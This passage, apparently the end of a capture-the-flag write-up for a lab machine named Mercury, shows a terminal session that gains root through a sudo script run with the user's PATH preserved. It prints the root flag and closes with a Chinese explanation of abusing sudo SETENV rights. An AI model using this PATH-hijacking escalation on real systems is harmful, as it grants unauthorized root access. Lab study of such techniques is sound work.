root@mercury:/tmp# exit
exit
linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh 
root@mercury:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@mercury:/tmp# cd ~
root@mercury:~# ls -la
total 56
drwx------  5 root root 4096 Sep  2  2020 .
drwxr-xr-x 19 root root 4096 Sep  1  2020 ..
-rw-------  1 root root 3214 May 23 17:14 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Aug 27  2020 .cache
-rw-------  1 root root   34 Sep  1  2020 .lesshst
drwxr-xr-x  3 root root 4096 Aug 28  2020 .local
-rw-------  1 root root 3619 Sep  1  2020 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root 1228 Sep  2  2020 root_flag.txt
drwx------  2 root root 4096 Aug 27  2020 .ssh
-rw-------  1 root root 9454 Sep  2  2020 .viminfo
root@mercury:~# cat root_flag.txt 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
root@mercury:~#

从上面的操作,我们可以看出对于SETENV权限,我们可以通过sudo PATH=$PATH /usr/bin/check_syslog.sh sudo --preserve-env=PATH /usr/bin/check_syslog.sh两种方式强制以当前用户PATH执行。